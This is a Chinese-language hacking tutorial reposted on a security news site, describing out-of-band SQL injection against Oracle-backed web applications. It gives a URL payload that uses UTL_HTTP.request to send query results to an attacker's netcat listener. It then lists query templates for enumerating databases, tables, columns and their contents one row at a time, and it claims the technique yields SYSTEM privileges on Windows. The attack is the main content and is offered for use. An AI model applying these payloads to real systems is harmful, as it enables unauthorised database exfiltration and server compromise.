频道栏目
首页 > 资讯 > 网站安全 > 正文

Oracle注射技术—Oracle+nc注射

09-05-03        来源:[db:作者]  
收藏   我要投稿

作者:Kindle
MSN :Kindle@live.cn
Blog:http://hi.baidu.com/system_exp
Team:反安全技术小组 (http://bbs.exploits.com.cn)

首先外网nc监听对应的端口

url语句简单如下所示:

http://www.exploits.com.cn/Kindle?jsp=1 and UTL_HTTP.request(外网ip:port/||(sql语句))=1--

内容如下:

and UTL_HTTP.request(外网ip:port/||(sql语句))=1--
爆库:

select owner from all_tables where rownum=1

select owner from all_tables where owner<>第一个库名 and rownum=1

select owner from all_tables where owner<>第一个库名 and owner<>第二个and rownum=1

select owner from all_tables where owner<>第一个库名 and owner<>第一个库名 and rownum=1


以此论推

爆表:

select TABLE_NAME from all_tables where owner=库名and rownum=1

select TABLE_NAME from all_tables where owner=库名and rownum=1 and TABLE_NAME<>表名1

select TABLE_NAME from all_tables where owner=库名and rownum=1 and TABLE_NAME<>表名1 and TABLE_NAME<>表名2

以此论推

爆列:

select COLUMN_NAME from user_tab_columns where table_name=表名 and rownum=1

select COLUMN_NAME from user_tab_columns where table_name=表名 and rownum=1 and COLUMN_NAME<>第一个爆出的列名

select COLUMN_NAME from user_tab_columns where table_name=表名 and rownum=1 and COLUMN_NAME<>第一个爆出的列名 and COLUMN_NAME<>第二个爆出的列名

爆内容:

第一个内容:select 列名 from 表名 where rownum=1

第二个内容:select 列名 from 表名 where rownum=1 and 列名<>第一个值

第三个内容:select 列名 from 表名 where rownum=1 and 列名<>第一个值 and 列名<>第二个值

以此论推

现在大家转过头来看下“万网的尴尬-万网ORACLE注入漏洞曝光”http://bbs.exploits.com.cn/read.php?tid-144.html

是不是很明了了...o(∩_∩)o...哈哈

注:
1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料
2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁
3.这是个系列文章,后文有待更新

相关TAG标签
上一篇:SQL手工注入大全
下一篇:打造完美安全系统 网管修补系统全攻略
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站